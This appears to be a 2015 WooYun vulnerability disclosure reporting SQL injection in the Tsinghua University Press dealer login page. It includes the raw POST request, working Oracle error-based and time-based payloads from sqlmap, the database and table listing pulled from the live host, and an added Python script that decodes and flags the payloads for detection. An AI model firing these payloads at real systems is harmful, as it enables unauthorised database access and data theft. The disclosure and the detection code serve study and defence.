WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, browse online -------- http://drop.zone.ci/
Disclosure timeline:
2015-05-08: Details sent to the vendor, awaiting the vendor's response
2015-05-11: Vendor confirmed the issue; details visible to the vendor only
2015-05-21: Details opened to core white hats and experts in the relevant field
2015-05-31: Details opened to regular white hats
2015-06-10: Details opened to intern white hats
2015-06-25: Details opened to the public
Welcome, Tsinghua University, to the WooYun family
1. Tsinghua University Press, dealer service system
http://dealer.tup.tsinghua.edu.cn/
2. The login form is SQL-injectable; the UNO parameter is the one that is vulnerable.
POST /login.asp HTTP/1.1
Host: dealer.tup.tsinghua.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://dealer.tup.tsinghua.edu.cn/
Cookie: safedog-flow-item=D961C6F6956C1C8A4C58645CF414C7F2; ASPSESSIONIDSCARBCCQ=CKHFGPPBDCKFIABCDLAEOFBN
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

UNO=a&Password=a&Submit=++++++
3. Run sqlmap against the request to confirm that the injection exists.
4. Databases:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: UNO
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
    Payload: UNO=a' AND 1575=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(111)||CHR(119)||CHR(100)||CHR(113)||(SELECT (CASE WHEN (1575=1575) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(97)||CHR(106)||CHR(100)||CHR(113)) AND 'aSTw'='aSTw&Password=a&Submit=

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: UNO=a' AND 4615=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(107)||CHR(84)||CHR(85),5) AND 'wFUV'='wFUV&Password=a&Submit=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
available databases [21]:
[*] AURORA$JIS$UTILITY$
[*] CB
[*] CDZ_CBS
[*] CTXSYS
[*] CW
[*] DEMO
[*] ERP
[*] FX
[*] FXOLD
[*] LAB
[*] MDSYS
[*] MTSSYS
[*] ORDSYS
[*] OSE$HTTP$ADMIN
[*] OUTLN
[*] QHCBS
[*] SCOTT
[*] SYS
[*] SYSTEM
[*] TOAD
[*] ZJSD1
Tables in the CDZ_CBS database:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: UNO
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
    Payload: UNO=a' AND 1575=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(111)||CHR(119)||CHR(100)||CHR(113)||(SELECT (CASE WHEN (1575=1575) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(97)||CHR(106)||CHR(100)||CHR(113)) AND 'aSTw'='aSTw&Password=a&Submit=

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: UNO=a' AND 4615=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(107)||CHR(84)||CHR(85),5) AND 'wFUV'='wFUV&Password=a&Submit=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
Database: CDZ_CBS
[477 tables]
CAO, EN_YS, EPC_CLI_COLLECTION, EPC_CLI_COLLECT_BY_EVENTID, EPC_CLI_COLLECT_BY_USERID, EPC_CLI_ENVIRONMENT,
EPC_CLI_ENVIRONMENT_VERSION, EPC_CLI_FDF_FILE, EPC_CLI_FORMAT, EPC_CLI_JOB, EPC_CLI_NODE, EPC_CLI_PROGRESS,
EPC_CLI_REP_USERS, EPC_CLI_SERVICE, EPC_CLI_USAGE, EPC_CLI_VERSION, EPC_MULTI_VIEWS, EPC_MULTI_VIEW_MAP,
EPC_MVIEW_CATEGORY_MAP, EPC_PRIMARY_ITEMS, EPC_TDV_VERSION, EPC_VIEW, EPC_VIEW_CATEGORY, EPC_VIEW_ITEMS,
EPC_VIEW_PREFERENCES, FX_YMXDDHG, FX_ZFJB,
HS_BGFY, HS_BJCB, HS_BJXX, HS_BMYS, HS_CBCB, HS_CBSXX, HS_CSXX, HS_CWRCFY, HS_CYLCXX, HS_DZDXB, HS_FUNC,
HS_GCCB, HS_HSBM, HS_JCCCB, HS_JCSXB, HS_KCLXB, HS_OAQQ, HS_PRINT_SET, HS_QUERY_TJ, HS_ROLES, HS_ROLES_GRANTS,
HS_SBXZB, HS_SELECT_VALUES, HS_TEST, HS_TEST1, HS_TEST2, HS_TSBBB, HS_TSGXZ, HS_TSHJXX, HS_TSLB, HS_TSSP,
HS_TSXX, HS_TSYCXX, HS_USERS, HS_USER_GRANTS, HS_USER_ROLES, HS_WZSMXZ, HS_XKLXB, HS_XMLYB, HS_XMMBB,
HS_XTJBB, HS_XTXX, HS_YCBHZ, HS_YCBHZ_TEMP, HS_YQCB, HS_YQXMB, HS_YQZQMXB, HS_YXCB, HS_YZCB, HS_YZTZDB,
HS_ZHBBCSSZ, HS_ZPLXB, HS_ZSYYB, HS_ZTFB, HS_ZYLXB, HS_ZYSFLB, HS_ZZK,
KH_DQB, KH_FKB, KH_FKTSB, KH_JSCBQKB, KH_JSGTQKB, KH_JSHDQKB, KH_JSKCXXB, KH_JSLPQKB, KH_JSXTJHB, KH_JSXXB,
KH_JSYJLYB, KH_JSYSQKB, KH_KCXXB, KH_KHDJ, KH_SFB, KH_XXB, KH_XXLX, KH_YXB, KH_YXDB, KH_YXDBQX, KH_ZJSZB,
KH_ZJYSB, KH_ZYB, KH_ZYFL, KH_ZYXF,
PLAN_TABLE, QK_ADMIN, QK_FAVORITE, QK_FILE, QK_NEWSARTICLE,
RL_BZMCB, RL_GWMCB, RL_MZB, RL_XLB, RL_ZBMCB, RL_ZCB, RL_ZWB, RL_ZZMMB,
SMP_DBREPORT_SQLSCRIPTS, SMP_DBREPORT_TEMPLATE, SMP_LMV_DISPLAY_OPTION, SMP_LMV_REDO_LOG, SMP_LMV_SEARCH_OBJECT,
SMP_LMV_SEARCH_RESULT, SMP_LOG_SQL, SMP_STANDBY_CONFIG_INFO, SMP_STANDBY_SITE_INFO, SMP_VAI_DBCONFIG,
SMP_VAR_EBU_ACTIVE_JOB_, SMP_VAR_EBU_SAVED_JOB_, SMP_VAR_OS_ACTIVE_JOB_, SMP_VAR_OS_SAVED_JOB_,
SMP_VAR_SMR_ACTIVE_JOB_, SMP_VAR_SMR_CHANNEL_DEVICE_, SMP_VAR_SMR_DEFAULT_CHANNEL_, SMP_VAR_SMR_LIST_DATABASES_,
SMP_VAR_SMR_RC_CONNECT_STRING_, SMP_VAR_SMR_SAVED_JOB_, SMP_VAR_SMR_TEMP_SCRIPTS_, SMP_VBOR_BACKUP_CONFIGURATION,
SMP_VBOR_BLOB, SMP_VBOR_CHANNELS_INFORMATION, SMP_VBOR_DEFAULT_CONFIG, SMP_VBOR_STRATEGY_INFORMATION,
SMP_VBO_JOB_CONFIG_TABLE, SMP_VBO_REPORTS, SMP_VBO_REPORTS_CONFIG, SMP_VBO_REPORTS_TYPE_DEFN,
SMP_VBO_REPORT_ELEMENTS, SMP_VBO_REPORT_INFO_SOURCES, SMP_VDD_OPERATIONS_TABLE, SMP_VDE_EVENT,
SMP_VDE_EVENT_ARCHIVE, SMP_VDE_EVENT_ARCHIVE_PURGE, SMP_VDE_EVENT_DETAILS, SMP_VDE_EVENT_LOCK_TAB,
SMP_VDE_EVENT_LOG, SMP_VDE_EVENT_OCCURRENCE, SMP_VDE_EVENT_OCCUR_DETAILS, SMP_VDE_EVENT_TARGET_ACK,
SMP_VDE_EVENT_TARGET_DETAILS, SMP_VDE_EVENT_TARGET_INFO, SMP_VDE_EVENT_TARGET_STATE, SMP_VDE_EVENT_UPDOWN_QUEUE,
SMP_VDE_METRIC_THRESHOLDS, SMP_VDE_NODE_UPDOWN_QUEUE, SMP_VDE_THRESHOLD_ASSOC, SMP_VDE_TRY_REMOVE_EVENT_QUEUE,
SMP_VDF_MASLIST, SMP_VDG_EVENTID_MAP, SMP_VDG_EVENT_DELETE_LIST, SMP_VDG_EVENT_NOTIF_LIST,
SMP_VDG_GATEWAY_MAP, SMP_VDG_JOBID_MAP, SMP_VDG_NODE_LIST, SMP_VDG_NODE_LOCK_TABLE, SMP_VDI_AOBJECT_NOTIFICATION,
SMP_VDI_OBJECT_TABLE, SMP_VDI_POS, SMP_VDI_TARGET_PROPERTIES, SMP_VDJ_JOB, SMP_VDJ_JOB_LOCK, SMP_VDJ_JOB_LOG,
SMP_VDJ_JOB_LOG_COMMENT, SMP_VDJ_JOB_LOG_INTERMED, SMP_VDJ_JOB_OUTPUT, SMP_VDJ_JOB_PER_TARGET, SMP_VDJ_JOB_TARGET,
SMP_VDM_ADDRESS, SMP_VDM_GLOBAL_INFO, SMP_VDM_LAST_NOTIF_SEQ_PERTYPE, SMP_VDM_NOTIFICATION,
SMP_VDM_NOTIFICATION_DETAILS, SMP_VDM_NOTIFICATION_NVPAIRS, SMP_VDM_NOTIFICATION_SERVICES,
SMP_VDM_PAGING_CARRIER_INFO, SMP_VDM_SESSION_NOTIFTYPE_PAIR, SMP_VDN_BLACKOUTSCHEDULE, SMP_VDN_GROUP_GROUP,
SMP_VDN_GROUP_LIST, SMP_VDN_GROUP_TARGET, SMP_VDN_NODE_LIST, SMP_VDN_NOTIFY, SMP_VDN_STATE, SMP_VDN_TARGET_LIST,
SMP_VDN_TARGET_PROPERTIES, SMP_VDN_TARGET_TYPE_DEFN, SMP_VDO_JOBID_SERVICEID, SMP_VDP_NODES, SMP_VDP_NODE_INFO,
SMP_VDP_NODE_INFO_VDD, SMP_VDP_NODE_OMS_MAP, SMP_VDP_OMS_NUM_NODES, SMP_VDP_OMS_REGION_MAP,
SMP_VDP_PGSRV_REGION_MAP, SMP_VDP_REGIONS, SMP_VDR_REGISTRY, SMP_VDS_REPOS_VERSION, SMP_VDS_SESSIONS_TABLE,
SMP_VDU_CALLBACK_TABLE, SMP_VDU_OBJECTS_TABLE, SMP_VDU_PRINCIPALS_TABLE, SMP_VDU_PRIVILEGE_TABLE,
SMP_VDV_DEFAULT_NOTIFY_PREFS, SMP_VDV_DEFAULT_PERMISSIONS, SMP_VDV_GENERAL, SMP_VDV_MAPI_EMAIL,
SMP_VDV_NOTIFICATION_SCHEDULE, SMP_VDV_PAGE, SMP_VDV_PAGING, SMP_VDV_PREFERRED_CREDENTIALS, SMP_VDV_SERVICE_PARMS,
SMP_VDV_SMTP_EMAIL, SMP_VDV_USER, SMP_VDV_USER_LOCALE, SMP_VDV_USER_PREF, SMP_VTA_DB_APP_POSITION_,
SMP_VTC_LAYOUT_PROPERTIES, SMP_VTD_CLIENT_STATE, SMP_VTD_DG_LOCATION, SMP_VTD_HISTORICAL_LOCATION,
SMP_VTM_CHART_DEFN, SMP_VTM_CHART_STATE_TARG_SPEC, SMP_VTM_DISPLAY_STATE, SMP_VTM_RECORDING_DATA,
SMP_VTM_UDCHART_COLUMNS, SMP_VTM_UDCHART_DEFN, SMP_VTP_UDCLASS_COLUMNS, SMP_VTP_UDCLASS_DEFN, SMP_VXA_SYSTEM_PREFS,
TB_ADMIN, TB_BOOK, TB_CATEGORY, TB_NEWSARTICLE,
VBZ$CHANGE_PLANS, VBZ$COMPARISONS, VBZ$COMPARISON_RESULTS, VBZ$DB_OBJ_NAMES, VBZ$DESTINATIONS, VBZ$DIRECTIVES,
VBZ$EDITED_SCRIPTS, VBZ$EXEMPLARS, VBZ$EX_UPDATES, VBZ$HISTORY, VBZ$IMPACT_LOG, VBZ$OBJECT_GRANTS, VBZ$OUTPUT_LOG,
VBZ$ROLE_GRANTS, VBZ$SCHEMAMAPS, VBZ$SCRIPTS, VBZ$SYS_PRIV_GRANTS, VBZ$VERSION,
VDK_APPLICATION, VDK_CLUSTER, VDK_CLUSTER_COLUMN, VDK_COLLECTION_ITEMS, VDK_COLUMN, VDK_CONSTRAINT,
VDK_CONSTRAINT_COLUMN, VDK_DATABASE, VDK_DATAFILE, VDK_DATAFILE_STATS, VDK_DATAFILE_STATS_BEGIN, VDK_DBUSER,
VDK_DELETE_QUEUE, VDK_FUNCTION, VDK_HOST_INFO, VDK_INDEX, VDK_INDEX_COLUMN, VDK_IND_PARTITIONS,
VDK_IND_SUBPARTITIONS, VDK_INSTANCE, VDK_INSTANCE_BUFFER_STATS, VDK_INSTANCE_BUFFER_STATS_B, VDK_INSTANCE_PARAMS,
VDK_INSTANCE_ROLLBACK_STATS, VDK_INSTANCE_SORT_STATS, VDK_INSTANCE_STATS, VDK_INSTANCE_STATS_BEGIN, VDK_LOG_TABLE,
VDK_OBJECT, VDK_PART_INDEXES, VDK_PART_KEY_COLUMNS, VDK_PART_TABLES, VDK_REP_CONTROL, VDK_REQUEST, VDK_SEGMENT,
VDK_SEQUENCE, VDK_SERVICE, VDK_SESSION, VDK_SQL, VDK_SQL_OBJECTS, VDK_SQL_STATEMENT_WORK, VDK_STORAGE_DEVICE,
VDK_SUBPART_KEY_COLUMNS, VDK_SYNONYM, VDK_TABLE, VDK_TABLESPACE, VDK_TAB_PARTITIONS, VDK_TAB_SUBPARTITIONS,
VDK_TMP_ANALYSIS_5, VDK_TMP_ANALYSIS_6, VDK_TMP_ANALYSIS_7, VDK_TMP_JOURNAL_5, VDK_TMP_JOURNAL_6, VDK_TMP_JOURNAL_7,
VDK_TMP_RECOMMENDATION_5, VDK_TMP_RECOMMENDATION_6, VDK_TMP_RECOMMENDATION_7, VDK_TMP_RULE_JOURNAL_5,
VDK_TMP_RULE_JOURNAL_6, VDK_TMP_RULE_JOURNAL_7, VDK_TMP_SQLCOLUMNREF_5, VDK_TMP_SQLCOLUMNREF_6,
VDK_TMP_SQLCOLUMNREF_7, VDK_TMP_SQLDEPEND_5, VDK_TMP_SQLDEPEND_6, VDK_TMP_SQLDEPEND_7, VDK_TMP_SQLHINTREF_5,
VDK_TMP_SQLHINTREF_6, VDK_TMP_SQLHINTREF_7, VDK_TMP_SQLINDEX_5, VDK_TMP_SQLINDEX_6, VDK_TMP_SQLINDEX_7,
VDK_TMP_SQLTABLEREF_5, VDK_TMP_SQLTABLEREF_6, VDK_TMP_SQLTABLEREF_7, VDK_TMP_SQLTABLE_5, VDK_TMP_SQLTABLE_6,
VDK_TMP_SQLTABLE_7, VDK_TMP_SQLTEXT_5, VDK_TMP_SQLTEXT_6, VDK_TMP_SQLTEXT_7, VDK_TMP_SQLXREF_5, VDK_TMP_SQLXREF_6,
VDK_TMP_SQLXREF_7, VDK_USER_RULE,
VMQ_DATABASE_PARAMS_DYNAMIC, VMQ_DATABASE_PARAMS_STATIC, VMQ_SQL_FAKE_INDEX, VMQ_SQL_FAKE_INDEX_COLUMNS,
VMQ_SQL_IMPORT_STATS, VMQ_SQL_ITEM, VMQ_SQL_PLAN_COST_ALL, VMQ_SQL_PLAN_COST_FIRST, VMQ_SQL_PLAN_RULE,
VMQ_SQL_STATS_COST_ALL, VMQ_SQL_STATS_COST_FIRST, VMQ_SQL_STATS_RULE, VMQ_SQL_TEXT, VMQ_SQL_UNQUALIFIED_NAMES,
WWW_BBS, WWW_FORUM, WWW_FORUMTYPE, WWW_KXFZ, WWW_NEWS, WWW_NEWSCLASS, WWW_OA, WWW_OACLASS, WWW_PUBLICMESSAGE,
WWW_REGUSER, WWW_SQ, WWW_TCLASS, WWW_USERS, WWW_XGTS,
YZ_CYXSB, YZ_DKJCB, YZ_DKJCXMB, YZ_FMHTB, YZ_FMZLB, YZ_FUMOHTB, YZ_FUMOHTMXB, YZ_FWBB, YZ_FYTZB, YZ_FYTZMXB,
YZ_FYTZZZB, YZ_KBB, YZ_MQHTB, YZ_MSHTB, YZ_MSHTMXB, YZ_MSZLB, YZ_PTHTB, YZ_QGHTB, YZ_RRHTB, YZ_SDDDB, YZ_SFHTB,
YZ_SFHTMXB, YZ_SGJLB, YZ_SQHTB, YZ_TJGYHTB, YZ_TJHTMXB, YZ_TJZLB, YZ_TZFYJS, YZ_TZFYXMB, YZ_UVHTB, YZ_UVHTMXB,
YZ_UVZLB, YZ_YAHTB, YZ_YHHTB, YZ_YSHTB, YZ_YSHTPBB, YZ_YSHTSSB, YZ_YSJCB, YZ_YSJCXMB, YZ_YSSSB, YZ_YSXMB,
YZ_YWHTB, YZ_YWZLB, YZ_YZDB, YZ_YZDGYB, YZ_YZDSSAPB, YZ_YZDYSXMB, YZ_YZFYB, YZ_YZFYJS, YZ_YZFYJSB, YZ_YZFYJS_PRINT,
YZ_YZFYMXB, YZ_YZFYMXB_TEST, YZ_YZYB, YZ_ZDFSB, YZ_ZDFYJS, YZ_ZDFYTZB, YZ_ZDHTB, YZ_ZDHTSFDJB, YZ_ZDHTYZDJB,
YZ_ZDXMB, YZ_ZWCXB,
ZZ_CKDB, ZZ_CYZZB, ZZ_GGB, ZZ_GYSB, ZZ_KZB, ZZ_MCB, ZZ_SLKB, ZZ_ZZBCDB, ZZ_ZZCGDDB, ZZ_ZZCKDB, ZZ_ZZDBDB,
ZZ_ZZHTB, ZZ_ZZHTMXB, ZZ_ZZJSB, ZZ_ZZJXCB, ZZ_ZZJXCB1, ZZ_ZZKCB, ZZ_ZZPDDB, ZZ_ZZRKDB, ZZ_ZZSHTZB, ZZ_ZZTJB,
ZZ_ZZTJBTEST, ZZ_ZZTJMXB, ZZ_ZZTJMXBTEST, ZZ_ZZYMPHJC, ZZ_ZZYMPHJC1
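Two details of the sqlmap output above are worth reading closely. The "total of 0 HTTP(s) requests" in the banner means the injection points were resumed from sqlmap's session file rather than re-tested in that run, and the captured request carries a safedog-flow-item cookie, i.e. a SafeDog WAF sits in front of login.asp and both payloads still went through. The strings sqlmap builds out of CHR(n)||CHR(m)||... are the part a signature filter has to see through: they are the boundary markers it wraps the extracted value in (error-based) and the pipe name it blocks on (time-based). The script below, an added example that is not part of the original report, decodes those chains back into literals, flags the UTL_INADDR / DBMS_PIPE techniques and the quote-rebalancing `AND 'x'='x` tail in a form-encoded POST body, and renders what a concatenating login query looks like with the payload spliced in. The two payload bodies are copied from the sqlmap output; the benign request body, the login query template and its column names are assumptions made for the example (HS_USERS is a table name from the dump, but nothing on the page says which table login.asp actually queries).

```python
"""Decode and flag the Oracle injection payloads recorded against /login.asp."""
import re
from urllib.parse import parse_qs

# Both payload bodies are copied verbatim from the sqlmap output in the report.
ERROR_BASED_BODY = (
    "UNO=a' AND 1575=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(111)||CHR(119)"
    "||CHR(100)||CHR(113)||(SELECT (CASE WHEN (1575=1575) THEN 1 ELSE 0 END) "
    "FROM DUAL)||CHR(113)||CHR(97)||CHR(106)||CHR(100)||CHR(113)) "
    "AND 'aSTw'='aSTw&Password=a&Submit="
)
TIME_BASED_BODY = (
    "UNO=a' AND 4615=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(107)||CHR(84)"
    "||CHR(85),5) AND 'wFUV'='wFUV&Password=a&Submit="
)
# Constructed benign login body (not from the report), used to check for false positives.
BENIGN_BODY = "UNO=D1001&Password=hunter2&Submit=++++++"

# A run of CHR(n) calls glued together with ||, the way sqlmap emits strings for Oracle.
CHR_CHAIN = re.compile(r"CHR\(\d+\)(?:\s*\|\|\s*CHR\(\d+\))*", re.I)


def decode_chr_chains(sql):
    """Rewrite every CHR(n)||CHR(m)||... run as the quoted literal it builds,
    so the marker strings hidden in the payload become readable."""
    def literal(match):
        codes = re.findall(r"\d+", match.group(0))
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return CHR_CHAIN.sub(literal, sql)


# Markers of the two techniques sqlmap used here, plus the tail that closes the
# quote the payload opened so the statement stays syntactically valid.
SIGNATURES = {
    "error-based (UTL_INADDR.GET_HOST_ADDRESS)":
        re.compile(r"UTL_INADDR\.GET_HOST_ADDRESS\s*\(", re.I),
    "time-based (DBMS_PIPE.RECEIVE_MESSAGE)":
        re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE\s*\(", re.I),
    "tautology tail":
        re.compile(r"\bAND\s+'(\w+)'\s*=\s*'\1\s*$", re.I),
}


def classify_body(body):
    """Map each form field to the injection techniques found in its value.
    Values are CHR()-decoded first so the signatures match the effective SQL."""
    hits = {}
    for field, values in parse_qs(body, keep_blank_values=True).items():
        for raw in values:
            decoded = decode_chr_chains(raw)
            found = [label for label, rx in SIGNATURES.items() if rx.search(decoded)]
            if found:
                hits.setdefault(field, []).extend(found)
    return hits


# Assumption, not from the report: a classic-ASP login that splices the form
# fields straight into the SQL text. The column names are placeholders chosen
# only to show how the payload opens a quote and then re-balances it.
def render_query(uno, password):
    return "SELECT * FROM HS_USERS WHERE UNO='%s' AND PASSWORD='%s'" % (uno, password)


def quotes_balanced(sql):
    """True when the statement has an even number of single quotes, which is
    what the trailing AND 'x'='x in the payload guarantees."""
    return sql.count("'") % 2 == 0


if __name__ == "__main__":
    for body in (ERROR_BASED_BODY, TIME_BASED_BODY, BENIGN_BODY):
        fields = parse_qs(body, keep_blank_values=True)
        query = render_query(decode_chr_chains(fields["UNO"][0]), fields["Password"][0])
        print(query)
        print("  quotes balanced:", quotes_balanced(query))
        print("  flagged:", classify_body(body) or "nothing")
```

Decoding shows the error-based payload wrapping the CASE result in `'qowdq'` and `'qajdq'` (sqlmap's delimiters for pulling the value out of the ORA error text) and the time-based one blocking for five seconds on a pipe named `'SkTU'`. Signature matching on the decoded text rather than the raw body is the point: a filter that only looks for quoted keywords never sees those strings.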
Severity: Low
Vulnerability Rank: 5
Confirmed: 2015-05-11 10:06
Thanks for the heads-up; we will fix this vulnerability as soon as possible.
(none)